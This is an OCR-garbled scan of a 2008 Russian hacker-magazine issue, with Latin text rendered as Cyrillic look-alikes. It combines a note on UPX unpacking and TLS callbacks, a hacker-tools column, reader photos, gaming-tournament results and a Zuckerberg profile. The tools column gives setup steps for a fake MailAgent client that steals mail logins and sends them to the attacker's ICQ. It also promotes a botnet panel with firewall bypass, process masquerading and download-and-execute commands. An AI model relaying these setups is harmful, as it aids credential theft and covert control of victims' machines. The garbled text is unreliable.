ЕхікРгосезз 


КЕШЕЬ32 








0040102Е : 


СЗ 


ге[п 





Ничего непонятно! Во-первых, в файле начисто отсутствует строка «;-)», 
зато есть «Ьиск». Вместо «Ьиск» мы получаем «[иск», а все потому, что 
«Ьиск»ссорится саргументом, переданным программе, — который при 
выполнении из шелла равен 046, а при запуске под отладчиком — ООГі . 
Так программа еще и отладчикдетектит? Здорово! Но все же, куда дева- 
лась наша улыбающаяся рожа? 

Упакованный вариант, видимо, вызывал функцию зіагі, передавая ей 
такой аргумент, который при наложении на Ьиск выдавал«:-]». Проделав 
обратную операцию, мы восстановим исходный аргумент— 6В4А5858Ь. 
Интересно, кто бы его могзаслать в стек?Ужточно не ИРХ! 

Извлекаем оригинальный ехе из архива и загружаем его в НІЕѴѴ. Втыка- 
ем в директорию таблиц. Видим, что там естьТЬЗ. Рысцой переключаем- 
ся на распакованную версию. ТЬЗ — кактурбиной сдуло. Что хоть в ТЬЗ 
было? Зовем на помощь ЮА-Рго или НІЕѴѴ. 



УТЕРЯННЫЙ ПРИ РАСПАКОВКЕ ТІ_5 САІ_І_ВАСК 




.00406160: 6858584А6В 


ризЬ 


06В4А5858 


.00406165: 50 


ризЬ 


еах 


.00406166: ЗЗСО 


хог 


еах, еах 


.00406168: 40 


іпс 


еах 


.00406169: 39442410 


стр 


[езр] [10] , еах 


. 0040616Б: 75ЕЕ 


дпе 


. 00040616Б --- А 


(1) 






. 0040616Е : Е9 6СЕЕЕЕЕЕ 


ЭЩр 


. 0004050Е0 --- А 


(2) 







Ага, вотон — ужезнакомый нам аргумент 6В4А5858Ь, засылаемый 
в стек. После чего саІІЬаск проверяет значение параметра Реазоп 
и, если он не вьь_ркосезз_аттасн, то циклит программу. В 
противном же случае передает управление на точку входа, давая 
отработать ІІРХ’у. Тот распаковывает программу и зовет 51а гі, остав- 
ляя на стеке 6В4А5858Ь. А вот при статической распаковке ІЧРХ не 
сохраняет ТЬЗ, поскольку ТЬ5 был наложен руками на уже упакован- 
ный ІІРХ’ом файл. 

Подобный трюк использовался в конкурсе, проводимом Е-5есиге. Боль- 
шое количествоучастников, видя знакомый ІІРХ, распаковывало его на 
автомате, теряя ТЬЗ-саиЬаск, а вместе с ним — и часть функционала. 
Вывод: перед распаковкой всегда смотри ТІ 5! т 



сісі оккзек 

сісі оккзек ТЬЗЕпсІ 
сісі оккзек 

сісі оккзек 

сісі 0 
сісі 0 
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взлом 



ЛЕОНИД «ВОЮ» СТРОИКОВІ 

і кот@вк.віі / 



Программы для хакеров 



ПРОГРАММА: ГАКЕ МАНАСЕІЧТ 5. 1 
РІГЧАІѴЕРЗІОІЧ 
ОС: УІІЧООУ 3 2000/ХР 
АВТОР: СІ_АО 1 АТ (О ОЮ 



Скрытое меню фейковойтулзы 

На страницахжурнала мы не раз писали отом, 
как мутят фейки сайта платежки или банка. Но 
на этот раз я собираюсь представить тебе со- 
вершенно новое направление в фейкостроении 
— создание фейковых клиентских приложе- 
ний. Чтобы не растекаться мыслью по древу, 
приведу в пример конкретную утилу — Раке 
МаіІАдепІ 5.1 РіпаІѴегзіоп. Тулза, какты уже до- 
гадался, представляет собой фейковую версию 
популярного ІМ-клиента «МаіІАдепІ» от Маіі.ги. 
Программа обладает рядом функциональных 
компонентов и имитирует работу оригинально- 
го приложения, сохраняя данные для доступа 
к мылу, вбитые пользователем в формочки. 
Отмечу сразу: за использование возможностей 



[Секция2 ] 

Текст в окне= 

[СекцияЗ ] 

Текст в окне=@таі1 . ги 
[СекцияІОІ] 

Текст в окне=123456 



В последней строчке указан уин хакера, что 
отчасти палит работу фейка. Если передать 
«товарищу» ехе’шник в комплекте с файлом 
Іпігііе . іпі, то можно ждать сообщений на 
указанный номер аси. 

В общем, в каких целях юзать тулзу и юзать ли 
вообще — делотвое. Я лишь показал одно из 
возможных направлений в фей к- индустрии. 
Будь осторожен! 

ПРОГРАММА: РІХСНЕК ВОТ 
ОС: У№0У5 2000/ХР 
АВТОР: РІХСНЕР 




Конфигурируем РіхсГіег ВоЕ 



2. Редактируем файл сопбід.рйр (ло- 
гин/пароль к СУБД) 

3. Запускаем в браузере скрипт 
іпзбаіі . рйр 

4 . С помощью билдера конфигурируем 
бота, прописав в билдере ряд пара- 
метров 



Из возможностей софтины можно выделить: 



• обход фаеров 

• работа от имени зѵсЬозб . ехе, 
Ізазз.ехе или любого другого про- 
цесса 

• загрузка файлов на компьютер по 
йббр : / / и ббр : / / 

• запуск ехе-файлов 

• возможность обновления бота (заме-| 
на новой версией) 

• бот получает новые команды только 
один раз (если боту передать коман- 
ду на скачивание (деб йббр : / /безб . 
ги/бііе . ехе) , то он один раз скачает | 
этот фай и будет ждать новых команд) 

• добавлена работа бота под ограни- 
ченными правами (Бзег/Гость) 



Серверное приложение ака бот поддерживает 
ряд специализированных команд: 



утилы в незаконных целях можно огрести по 
полной, посему предлагаю тебе лишь ознако- 
миться с прогой. Итак, алгоритм действий при 
работе с тулзой следующий: 



1. Запускаем ехе ' шник 

2 . Устанавливаем курсор мышки рядом 
с надписью «Забыли?» (внимание на 
скрин, — иначе можно тыкать курсором 
в поисках скрытой кнопки до посине- 
ния) 

3 . Жмем на скрытый баттон 

4 . В открывшемся меню вбиваем ІСС>- 
номер , который будет принимать логи 
с фейка 

5 . Жмем баттон «Сохранить и выйти» 



В результате появился файл Іпігііе.іпі с 
малопонятным содержимым: 



В последнее время широкое распростра- 
нение получили так называемые «системы 
удаленного администрирования». Что 
скрывается под этим названием, полагаю, 
объяснять не нужно. Зачастую требует- 
ся надежный инструмент контроля над 
забугорным ботнетом или конкретной 
«жертвой». Посему представляю твоему 
вниманию продукт «Ріхсбег Воі», предна- 
значенный для комфортного удаленного 
администрирования всего, чего твоя душа 
только пожелает. 

Сначалатебе необходимоустановить веб-ад- 
минку на свой хост. Для этого: 



1. Ставим права на запись на файл 
соттапб . бхб , а также на каталог 
бііез 



• деб — скачать файл по йббр: // или 
по ббр:// (пример: деб Ьббр : / /безб . 
ги/ бііе . 611 ) 

• дебехе — скачать и запустить файл 
(пример: деб Ьббр : //безб . ги/бііе . 
ехе) 

• теззаде — мессадж бокс (пример: 
теззаде ЫаЫаЫа) 

• сііе — удаление бота из системы и 
выгрузка его из памяти 

• ехес — запуск ехе-файла, выполне- 
ние системных команд (пример: ехес 
безб . ехе) 



Крометого, в админке реализована удобная 
стата, в которой видны ір-адреса и уникальные 
ключи (принадлежность кжелезу] всех ботов, 
обращавшихся за командами. 



► 084 
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Одним словом, если есть, что «админить», но 
нечем — обрати внимание на эту «систему»! 

ПРОГРАММА: АѴЕ 

ОС:У№0У5 98/ІЧТ/2000/ХР 
АВТОР: ОЛЕГ ЗАЙЦЕВ 




Учитывая набор софта в нынешнем выпуске 
Х-Тулз, справедливости ради предлагаю тебе 
обратить внимание на антивирусную утилу 
АѴ2. Лозунг ее гласит: «Утила предназначена 
для уничтожения ЭруѴѴаге и АбѴѴаге модулей, 
сетевых вирусов (ѴѴогт), троянских программ». 
По заявлению разработчика, утила также 
содержитспециализированные алгоритмы для 
поиска кейлоггеров и руткитов. Должен тебе 
сказать, это заявление вовсе не безоснова- 
тельно (стал бы я иначе занимать драгоценные 
строчки рубрики!). 

Если посмотреть на интерфейс софтины, то 
можно без труда определить ее ключевые 
функции: 



1. «Пуск» позволяет запустить про- 
верку выбранных дисков и каталогов 

2. «Пауза» позволяет временно приос- 
тановить проверку файлов. Возобнов- 
ление сканирования производится пов 
торным нажатием на кнопку «Пауза» 

3 . «Стоп» позволяет в любой момент 
прервать процесс проверки 



Крометого, АѴ2 поддерживает работу с пара- 
метрами командной строки. Значения парамет- 
ров имеют ВИД: 



{ } — обязательный строковый пара- 


метр , 




[ опция | опция ] - 


- одна из перечислен- 


ных опций 





Все настройки, полученные через параметры 
командной строки, дублируются элемента- 
ми интерфейса. Это позволяет производить 
настройки АѴ2 через командную строку без 
запуска сканирования. Для примера, приведу 
краткий переченьосновных параметров при 
работе через консоль, которые могут приго- 
диться тебе еще не раз: 



5САМ={каталог} — добавляет каталог или диск 
в списоксканируемых. Путьдолжен начитаться 
с буквы диска, например с : Хміпбомз. Также, 
ты можешьуказать неограниченное количест- 
во параметров 5САІЧ, содержащих разные 
значения. 

5САМ0РІѴЕ=[Н00|Р00|С0Р0М] -добавляет 
все диски заданного типа в списоксканируе- 
мых. Поддерживается три типа дисков: 

• НЭЭ — винты ака жесткие диски; 

• РЭЭ — флопики ака дисководы и Ріазб-диски; 

• СЭРОМ — СЭ/ЭѴЭ-диски. 

5САМРІІ_Е={имя файла} — сканирование 
отдельного файла. Например: 8 САЫРіье=с : \ 
міпбсллз \ і і 1 е . ехе 
І\І05САМ={каталог} — исключение задан- 
ного каталога из списка проверяемых. Путь 
должен начитаться с буквы диска, например, 

с : Хміпбомз. В командной строке разрешено 
указывать неограниченное количество пара- 
метров ШЗСАЫ — так как обрабатываются все 
параметры, то можно задать ограничения на 
сканирование нескольких каталогов. Напри- 
мер: ЗСАЫ=с:\ ЫОЗСАМ=с : \ Петр — будет 
проведено сканирование всего диска С : \ , за 
исключением каталога СДіютр. 
5сапАИРіІе5=[Ѵ|І\І] — сканировать все файлы 
(независимо от расширения). Аналогично 
установке переключателя <Типы файлов> в 
положение <Все файлы>. 

5сапРіІезМосІе=[0|1 12] — задает режим скани- 
рования: 

• 0 — сканирование потенциально-опасных 
файлов; 

• 1 — сканирование всех файлов; 

• 2 — сканирование файлов по маске (необхо- 
димо задать маску). 

ІпсІисіеРіІе5={маска} — задает маску (или на- 
бор масок) файлов, которые необходимо прове- 
рить. Аналогичнозаполнению поля <Включая 
файлы по маске:>. 

ЕхсІисіеРіІе5={маска} — исключить файлы с 
именами/расширениями по маске. Аналогично 
заполнению поля <Исключая файлы по маске: >. 
ѴѴіпТги5Ц_еѵеІ=[0|1 12] — режим проверки 
файла по каталогу безопасности МісгозоЛ 
(О — отключена, 1 — проверка по катало- 
гу, 2 — проверка по каталогу). По дефолту 
установлен режим «1 »; включение режима 
«2» повышает надежность проверки, но уве- 
личивает время проверки файла примерно в 
два-три раза. 

Полное описание всех команд ты найдешь в 
справочнике АѴ2. Советую изучить их, иботулза 
отлично дружите консолью. Из плюсов утилы 
выделю ито, что она нетребуетустановки, а, 
следовательно, можетзапросто пополнитьтвой 
запас боевого софта на флешке. 

ПРОГРАММА: ІЧЕТ5ТАТ АСЕІЧТ 
ОС: ѴІІЧ&0ѴЗ 2000/ХР 
АВТОР:_СІ_А& 1 АТ(0_0Ю_ 

Порой использования одних стандартных кон- 
сольныхутил (типа пеізіаі, ріпд, ІтасегЕ агр, 



гоіПе, ірсопбд) оказывается недостаточно. Под 
рукой было бы неплохо иметь функциональ- 
ный сетевой инструмент — такой, как І\1е1:5і:а1: 
АдепЕ Это сетевая утила для мониторинга 
на твоем компе интернет-соединений и для 
диагностики настроек Сети. 

Тулза отображает все активные ТСР- и ЭЭР- 
соединения — и их состояние. Для удаленного 
ІР-адреса отображается его географическое 
местоположение и имя ака Ьозіпаппе. Кроме 
ТСР и ІЮР-соеди нений, прога выводит всю 
инфу о процессе, владельце соединения 
(пашеттолько подХР), путь, информацию 
о разработчике, версию и свойства прило- 
жения, список используемых модулей ака 
сИІ-библиотек. 

С помощью гибких настроекмониторинга 
ты сможешь без проблем отфильтровать или 
закрыть ненужные соединения или убить пос- 
торонний процесс. 

В состав N еЕЗЕаІ; Аде пі также входит несколько 
полезныхутил, таких как: 



ріпд — позволяет проверить доступ- 
ность хоста, а также проверить рабо- 
тоспособность ТСР/ІР-настроек Сети 
бгасегб — отображает маршрут пакетов 
к конечному хосту 

агр — позволяет вывести и отредакти- 
ровать АКР-кеш 

ірсопіід — выводит всю информацию о 
сетевых интерфейсах и адаптерах 
гоибе — выводит таблицу маршрутиза- 
ции (ІР); позволяет добавить, отре- 
дактировать или удалить маршрут 



Основные возможности софтины: 



• Отслеживает ТСР и ШР-соединения 
на твоем компе. Каждое новое или ус- 
таревшее соединение подсвечивается 

• Утила обладает возможностью скон- 
фигурировать специальные правила, 
которые будут закрывать нежелатель- 
ные соединения, завершать процесс, 
проигрывать звуковое оповещение или 
запускать другие программы 

• Ты можешь обновлять и освобождать 
БНСР-настройки адаптера 

• Программа строит график для Ріпд и 
ТгасеКосШе, выводит географическое 
положение каждого маршрутизатора 

• Выводит сетевую статистику для 
адаптеров и ТСР/ІР-протоколов 

• Мощный лог менеджер позволит тебе 
просматривать, удалять и очищать 
пебзбаб и агр лог-файлы 



ЫеіЗіаІ: Адепі представляет собой мощную 
замену стандартным консольным утилитам: 
пеІзІаЕ ріпд, ІгасегЕ агр, гоіПе, ірсопбд. Насто- 
ятельно рекомендую обзавестись подобной 
утилой, поверь, зачастую она просто незаме- 
нима :). “Г 
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РАБОЧИЕ МЕСТА ЧИТАТЕЛЕМ 




^ВисЬ МахЫаггМігатаіІ.ги) разобрал свои ко мпьютеры, а соб 
|рать не может. Работать негде, помогите ему, 




Гбиги бгеа* (отопИхакерти) за буком работаеттолько с калашом 
[Правильно, надо быть начеку, а то еще ра^^пут 





«У РАІех ІВМ (гаіехгахакер.ги) под воздействием излучения 286-ого В| 
бутылке выросло очень интересное дерево. Говорят, должно глушить 
'гибддшные радары. 




Посмотрев на шторы товарища ЗепегаІГа (депегаіігахакег.ги) 
[решили не коммертировать. Словнет\И 







Не, ну туке — это еще ладно, мужику можно себе позволить держать одного 
акого рядом с компом. Но, что это, 0$#, за слоник? Может, ІихтазЫпе^И 
(іихтазЫпегадтаіІ.сот) ду мает, что этот с хоботом похож на іУ ДУ^ріН 
постргесовское лого? Ну-ну г Л 
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Пришли на та§ап'пе@геа1. .хакер. т фотку своего действительно хакерского 
рабочего места (в хорошем разрешении) и мы опубликуем ее в следующих 
номерах! 




На полу Антону Тарасову (іоха.ІБігадтаіІ.сот) удобнее, чем на столе, 




Рому (готкгахакер.ги) переселилито ли вчулан.толи в коридор, ноточноН 
— поближе к верхней одежде. В компах можетзавестись моль, Ром, затраха 
ешься обезжучивать. ^ 




За соседним столом Кири лла Ященко (кігіІігауазЬсЬепко.ги) нетбольше 
ни монитора, ни ноутбука. ■ 




Мистер Еуген Эорг(диаке2006(сІтаі1.ги) читает книгу «Компьютерное 
зловредство»Жени Касперского. Наш желудок подобного бы не^^ 
в ы де ржа л. Щ ^ Щ 




На Ирину Раткевич (іппа_га*кеѵісІігахакер.ги] напало стадо каких-то пушис- 
' тых гремлинов. И, судя по всему, они победили и забрали рабочее место себе. 

И еще они, похоже, приенсли с собой фаллоимитатор (справа]. Или это ракета? 
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Чемпионы в каждой номинации получили специальный приз 
оторганизаторов - монитор Батзипд 5упсМаз1:егТ220О. Кроме 
красивых поединков зрители могли насладиться интересной 
развлекательной программой, подготовленной организаторами. 

Она включала в себя мини-турниры в спонсорской зоне, конкурсы и шоу 
танцовщиц на большой сцене, где также перед церемонией награжде- 
ния успел выступитьзнаменитый Александр Пушной. 






сцена 



4 



т 



ѴѴС0 РОССИЯ 2008Ж 



Чемпионаты мира устраиваются не только среди хакеров и програм- 
мистов, но и среди простых любителей компьютерных игр. Впрочем, 
если посмотреть на количество кибертурниров и размеры призовых, то 
невольно начинаешьзадумываться над, казалось бы, незатейливым 
занятием геймеров, ведь стать настоящим профессионалом ой как 
сложно. 

Тут одними учебниками не обойтись — нужны еще везение и талант, а 
самые же талантливые ежегодно собираются на крупнейшем меропри- 
ятии под названием ѴѴогІсІ СуЬегбатез. Данные соревнования разбиты 
на три этапа, два из которых являются отборочными для более чем 
семидесяти стран мира. И именно по их итогам формируются сборные 
для выступления на заключительном Большом Финале (нынче состоится 
в ноябре в Германии]. У нас национальная квалификация проходит уже 
восемь лет подряд, и в этот раз почти триста финалистов со всей России 
собрались в одном из павильонов ВВЦ в Москве. Втечениетрехдней, с 
12 по 14 сентября, лучшие из лучших мерялись силами в пяти дисципли- 
нах: ѴѴагсгаД III: ТЬе Ргогеп Тбігопе, ВіагСга^: Вгообѵѵаг, Соипіег-Вігіке, 
РІРА08 и ІЧеесІ бог ЗреесІ Рго ЗіхееР Бои выдались крайне напряженны- 



ми, таккакпомимо путевокна международное первенство на кону стояли 
55 000 призовых долларов, предоставленные глобальным партнером и 
генеральным спонсором, компанией Затзипд (техническую поддержку 
обеспечивала ІРГІ]. Практически в каждой номинации не обошлось 
без сюрпризов, а множество фаворитов вообще вылетело на ранних 
стадиях. Например, в «вечно молодой» стратегии БФгСгаіб, вышедшей 
в далеком 1998-ом, считавшиеся непобедимыми Апсігоісіе, Асіѵокабе 
и ІЧоіЧоги даже не вошли в тройку сильнейших. Отчасти ребятам не 
повезло сжеребьевкой — они банально повыбивали другдруга. Однако 
и другие дуэлянты перед турни ром времени даром не теряли и упорно 
тренировались, поэтому еще вопрос, кто был более достоин пьедестала. 
Похожая ситуация сложилась в РІРА08, ІЧеесІ бог ЗреесІ и ѴѴа гс га бб III, и 
лишь в Сои пбег-5бгіке единственную квоту на ОгапсІ Ріпаізавоевали 
прошлогодние чемпионы ѴігШз.Рго, которые, правда, опять были вы- 
нуждены участвовать не в своем основном составе, из-за наличия в нем 
украинских игроков. И хотя это давало некое преимущество соперникам, 
те не сумели им воспользоваться. Ниже предлагаются полные результа- 
ты ѴѴСО Россия 2008. 



Результаты Ѵѵагсгап III: 



Результаты ГІГАо8:^ИмВБ 

ТТ^ЗІате [Магнитогорск! — 3000 $ + поездканаУ?Сб2008 6Р 
Д^рЯс^^уш^<ин^Ч 5 00 ^?поёздк а наѴѴСбгоо^^^и 
с^^^И^МаПзІГ^МоскваТ^ 1 0ОО^Тпоёздка на ѴѴСб 2008 6 



у — Хуіідап (Волгоград) — 3000$ + поездка на ѴѴС6 20086Р 
3 — Оиаі (Москва) — 1500$ + поезд ка наѴ УСб2008 брД 
3 — 51 іпд (Сочи) — 1000$ + поездка на ѴѴС6 2008 6Р. 



3 место 



Результаты БІагСгап: /| ^ИР 

Д — Роті (Сан кт- Пете рбург) — 3000$ + поез дка на ѴѴС6 2 008 6Р; _ -Д|Г 
Я-^ГосаПіоШсанк^Іетербург) — 1500ІГ+ поездканаЖС 2008 6Р-у^|д 
сДВаД— ВКАТ ОК (Санкт- Петер бург) — 1000$ + поездка на ѴѴСб 2008 6Р. 



Рез 



іьтаты ІЧеесІ Рог ърееа: 

— РгоБІгее* (Як утск) — 3000$*+ поездка наѴѴСб 2008 6РІ 

— МгРазег (Москва) — 1 500^+ поездкана ѴѴСб гоов^бР-І 



— МгТипег (Братск) — 1000$ + поездка на ѴѴСб 2008 6Р. 

V Г \ " ) н 



3 место 



Рез 



уіьтаты РІРА08: 

— Біате (Магнитогорск) — 3000$ + поездка на ѴѴСб 2008 6Р; 



^рПс а Тпушкин) — 1500$ + поездка на ѴѴСб 2008 6Р; 
— МаІізИ (Москва) — 1000$ + поездка на ѴѴСб 2008 6Р. 
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ПЕРВЫЕ ШАГИ 



Начиная эту статью, я хотела, было, написать, что Марка врядли можно 
назвать юным гением бизнеса, ведь отнюдь не гениальная стратегия или 
сверх-талант помогли ему стать тем, кем он стал. Но, подумав, я поня- 
ла, что это была бы неправда, аточнее, полуправда, потому как парень 
он — определенно весьма одаренный, если, в самом деле, не сказать 
гениальный. И пусть его тала нт при этом не относится кобласти бизнеса 
или маркетинга (хотя это тоже спорный вопрос — ведь пока что Цукерберг 
уверенно доказывает, что разбирается не только в компьютерах и психо- 
логии, но и умеет считатьденьги]. Впрочем, мы забегаем вперед. 

Родился Марк14мая 1984 года, в Соединенных Штатах, какты понима- 
ешь, Америки, в обычной еврейско-американской семье врачей (отец 
— стоматолог, мать — психиатр]. Он не был единственным ребенком в 
семье, помимо нашего героя у Цукербергов еще трое отпрысков. 

Детство Марка протекало, в общем-то, довольно обычно, до тех пор, пока 
ему не купили компьютер. Дело в том, что у одного его друга компьютер 
уже имелся, и, находясь под впечатлением, Маркуговорил родителей 
купить технику и ему. Произошло радостное событие, когда Цукербергу 
было 10-12лет(он сам затрудняется вспомнить точнее), и машинка пред- 
ставляла собой 0иапІех4860Х на процессоре ІпІе1486. После приоб- 
ретения Марк почувствовал себя ужасно взрослым и от новой игрушки 
первое время буквально не отходил. Впрочем, уже через пару месяцев 



ему надоело просто менять цвет бэкграунда, и он принялся читать умные 
книжки, решив научиться чему-то более полезному, а именно — програм- 
мированию. 

Чтение пошло на пользу. С программерскими премудростями Маркосво- 
ился отлично и, еще учась в старшей школе, написал несколько мелких 
софтинок, например, компьютерную версию популярной настольной 
игры Різк. Но не всеего поделки былитакбезобидны. В принципе, и сам 
Цукерберг говорит, что он не хотел бы сразу создавать нечто глобальное, 
но рад бы сделать кучу прикольных мелочей, и вот программа Вупарзе как 
раз относится ктаковым. Он написал ее для себя. Прога представляла 
собой умный трЗ-плеер, который, внимательно изучив предпочтения 
владельца и выяснив, какую музыку, в какое время суток и как часто, тот 
слушает, способен был генерировать плейлисты самостоятельно, «угады- 
вая», какиетреки хозяину захочется услышать именно сейчас. Необычной 
программой заинтересовались ни много, ни мало, в МісгозоГС, а самим 
Цукербергом — и в Місгозоіі:, и в А01_. Однако юное дарование отклони- 
ло предложения гигантов о покупке Вупарзе, а затем вежливо отвергло 
и их приглашения к сотрудничеству. Воттакпросто Маркотказался от 
нескольких десятков, а может, и сотен тысяч долларов, и работы в одной из 
топовых ІТ-корпораций мира. Вместо этого он поступил в Гарвард. 

Стоит сделать небольшое отступление и сказать, что экстравагантными, 
по меркам тех кругов, где ему приходится вращаться, выходками 
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Цукербергславится и посейдень. Ему совершенно «не слабо» отклонить 
предложение о встрече с представителями все той же Місгозоіф только 
потому, что встреча назначена на 8утра. «В это время я еще сплю», 

— поясняетон, вызывая у общественности настоящий шок. Или отложить 
переговоры с компанией Ѵабоо на понедельник, освобождая выходные, 
вто время когда речь шла о сделке на миллиарддолларов. А все потому 
что на выходные к Марку должна приехать его девушка, а какие-то там 
миллиарды всегда могут подождать. 

Возможно, такому поведению есть более прозаическое объяснение, 
чем молодость или желание выделиться (о глупости или наивности 
в данном случае и заикаться не стоит]. Марк — совершенно клас- 
сический нерд, или гик, буквально физическое воплощение этих 
типажей. Современные ученые подметили, что среди таких товарищей 
довольно широко распространен синдром Аспергера, или же форма 
высокофункционального аутизма. Иногда его еще называют синдро- 
мом Гиков, или Кремниевой долины. Люди с этой болезнью, как прави- 
ло, имеют весьма высокий уровень Ю, узкий, но горячо любимый круг 
интересов, внутри которого являются едва ли не гениями, но одно- 
временно испытывают серьезные социальныетрудности и, зачастую, 
ставят свою работу превыше всего остального, уходя в нее с головой. 

А их работа и интересы нередко сконцентрированы именно вокруг 
компьютеров, науки, инженерии и тому подобных вещей. Цифры для 



них гораздо понятнее людей, интереснее и ближе. Сам по себе сидром 
Аспергера — штука, вызывающая много споров в научном мире, но, 
все же, болезнь реальная, диагностирована у таких известных людей, 
как режиссер Стивен Спилберг или лауреат нобелевской премии Вер- 
нон Смит. Бытует мнение, что ей также страдали Альберт Эйнштейн и 
Исаак Ньютон. 

Возвращаясь к Марку, можно провести параллели и предположить, что 
именно поэтому он такстранно относится к«глупым условностям» и 
строгим рамкам, установленным в мире большого бизнеса. Учитывая, что 
он также предпочитает одеваться в видавшие виды джинсы, футболки 
и сандалии на босу ногу (вне зависимости оттого, где находится], а спит, 
по собственному признанию, в спартанской обстановке — в полупустой 
комнате, с надувным матрасом на полу, ему явно чужды и попросту не 
интересны материальные блага. Зато ему интересното, что он делает: его 
работа, его компания и его детище — РасеЬоок. 



шзшшт 



В Гарварде Цукерберг обучался далеко не компьютерным наукам, как 
можно подумать, — а психологии, лишь «в довесок» посещая курсы по 
компьютернойтехнике. Пожалуй, именно знание человеческой психо- 
логии и сыграло не последнюю роль, когда на свет родилась концепция 
РасеЬоок’а. Впрочем, с историей создания нетаквсе просто. Досих пор 
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неизвестно доподлинно, «позаимствовал» Маркэту идеюутоварищей 
по колледжу или дошел до нее сам, а товарищи лишь подтолкнули его к 
реализации. 

Как бы там ни было, происходило все в конце 2003-го года. Тогда од- 
нокурсники привлекли нашего героя к работе над проектом СоппесШ, 
над которым корпели уже порядка года. Они создавали веб-сайт нового 
типа — помесьтого, что сегодня мы называем социальной сетью, с 
сайтом знакомств. Ориентировались на студентов и выпускников 
колледжей или университетов, стремясь создать место, где те могли 
бы встречаться, общаться, знакомиться, обмениваться информацией и 
такдалее. Намерения были самые серьезные, имелся и бизнес-план: 
доходы планировалось получать от рекламы, ведь целевую аудиторию 
проекта сложно было назвать бедной. И вот в 2003-м им понадобился 
помощник протер, для завершения работы над ПО. Так Цукерберг 
получил полный доступ ко всем исходникам и даже принял определен- 
ное участие в бизнес-планировании, разработке интерфейсов и прочих 
серьезных вещах. 

Кстати, совсем незадолго до это го (буквально за несколько месяцев) 
у Марка также состоялся весьма плотный опытобщения с внутренней 
сетью Гарварда. Тогда он инициировал голосование, выставив на 
всеобщее обозрение фотографии двух учениц и попросив народ выбрать 
лучшую. Затея удалась настолько хорошо, что из-за перегрузки упал сер- 
вер. По голове Цукерберга за это, конечно, не погладили — он получил 
дисциплинарное взыскание, но, видимо, уже тогда подметил, что такого 
рода вещи вызываюту народа бурный интерес. В Гарварде, кстати, до сих 
пор отказываются комментировать тот инцидент. 

И вот Марку в руки попали все исходники СоппесШ. Трем основопо- 
ложникам этого начинания — братьям Кэмерону и Тайлеру Винклвоссу 
и Ди вии Нарендра — было очень важно закончить и запустить сайт до 
окончания университета, а времени оставалось совсем мало. Цукер- 
берг клятвенно заверил их, что все сделает и управится в самые корот- 
кие сроки. Но вместо этого, не ставя упомянутую троицу в известность, 

11 января 2004 он регистрирует доменное имя ТЬе РасеЬоок. сот (от 
артикля «ТЬе» потом быстро избавятся, для сокращения и упрощения 
названия)... Самое интересное, что работу в СоппесШ Маркие оставлял 
до последнего, так что наивные «работодатели» даже не подозревали, 
что творится за их спинами. Лишь почти месяц спустя — 4 февраля 
2004 — когда состоялся запуск ШеІъсеЬоок.сопп . который в точности 
повторял все идеи СоппесШ и изрядно копировал его даже визуально, 
им открылась правда. Ребята спешно наняли других программистов, 
потратили на доработку еще 4 месяца, все же запустили свой проект, но 
безнадежно опоздали. Некогда свободную нишу уже занимал великий 
и ужасный РасеЬоок. Марк поймал волну, и это оказалась цунами. 

Хотя, не та к страшен черт. Во всяком случае, не был та к уж страшен 
поначалу. По первости ШеІъсеЬоок.сопп представлял собой социальную 
сеть исключительно Гарварда, и лишь несколько месяцев спустя она 
расширилась до колледжей и университетов со всей страны. Затем к 
делу плавно подключилисьучебныезаведения со всего мира, иужесов- 
сем недавно — в 2006-м году сайт, наконец, открыл свои двери для всех, 
включая взрослую аудиторию. Словом, начиналось все с малого. 

Таккаку нас РасеЬоокдо сих пор не особенно популярен (русскиетам, 
конечно, есть, но не слишком много), стоит, наверное, вкратце объяснить, 
что это за зверь. Что такое социальная сеть, сегодня знает каждый более 
или менее активный юзер интернета, поэтому втермины вдаваться не 
будем. Вопрос, скорее, втом, что все они неуловимо отличаются друг от 
друга. У каждой сети есть какие-то свои особенности и фишки. Что ж, 
тогда объяснить, что такое РасеЬоок, очень просто, ведь перед глазами 
у нас с тобой есть нагляднейший пример, выполненный «по образу 
и подобию» — наш российский сайт ВКонтакте. Сейчас мы не будем 
говорить о плагиате и показывать пальцем (этим и так не занимается 
только ленивый), оставим лишь суть. ВКонтакте — это практически клон 
РасеЬоок’а. Сайты даже внешне похожи, как близнецы, хотя относитель- 
но «начинки» наши разработчики давно и с пеной у рта уверяют, что, 
дойди дело до суда, ничего страшного не случится. Мол, и коду нас свой 
собственный и, вообще, все идеи чем-то неуловимо похожи, и практи- 



чески о любой из них можно сказать: «а, это уже было воттам-то!». Тем 
не менее, фундаменту сайтов одинаковый — поискбывшиходнокаш- 
ников, группы по интересам, стена для комментариев (оченьзаметная и 
некогда оригинальная особенность РасеЬоок) и многое другое «роднит» 
их. Хотя правильнее будет сказать «роднило», так как на сегодняшний 
день ВКонтакте это, скорее, очень «бюджетный» клон РасеЬоок’а, этакая 
бледная тень. Ведь последний активно развивается, вводя в обиход та- 
кие вещи, о которых в наших соц. сетях даже не слышали. Об этом — чуть 
ниже, а пока вернемся к Марку. 

После запуска сайта и довольно-таки позорного ухода из СоппесШ, 
Цукербергзаявил прессе, что РасеЬоок был написан всего за неде- 
лю, а данная идея просто вызрела у него в голове и была быстренько 
реализована, «не отходя от кассы». Благо, еще и сокурсники помогли 

— вместе с Марком лончем проекта занимались еще Эдуардо Сэве- 
рин (Есіиагсіо Заѵегіп), Дастин Московиц (ОизЬп МозкоѵіШ], Эндрю 
МакКоллум (Апсігеѵѵ МсСоІІит) и КристоферХьюз (СЬгШорЬег НидЬез). 
Хорошее место Гарвард — под рукой специалисты на любой вкус! 

В целом, новорожденная сеть развивалась быстро, очень быстро. Уже 
весной 2004 в нее входили все колледжи лиги Плюща, а в сентябре при- 
шли и первые серьезные инвестиции. В РасеЬоок вложился ПитерТиле, 
основатель платежной системы РауРаІ, предоставив в распоряжение 
юных бизнесменов 500.000 долларов. Кконцу2004 года на порталезаре- 
гистрировался уже миллион человек, и на РасеЬоок обратили внимание 
и более крупные игроки — известный венчурный фонд Ассеі РаНпегз 
инвестировал в проект 12.5 млн. долларов. 

Адальше, как водится, больше. Деньги потекли к Марку и сотоварищам 
рекой, равно каки пользователи, число которых росло в геометрической 
прогрессии. Здесьлучше всего говорит статистика — РасеЬоок давно и 
прочно укоренился в списке самых посещаемых сайтов США. Ктомуже, 
он на четвертом месте в мире по генерации трафика. Пользователей на 
сегодня более 100 миллионов... Вдумайся в эту цифру! Сайтпереведен на 
1 5 языков, включая русский, и на его платформе запущено свыше 24.000 
приложений. Сыграв на одной из самых острых потребностей человека 

— потребности в общении, Цукерберг в прямом смысле озолотился. 



..И ЕГО последствия! 



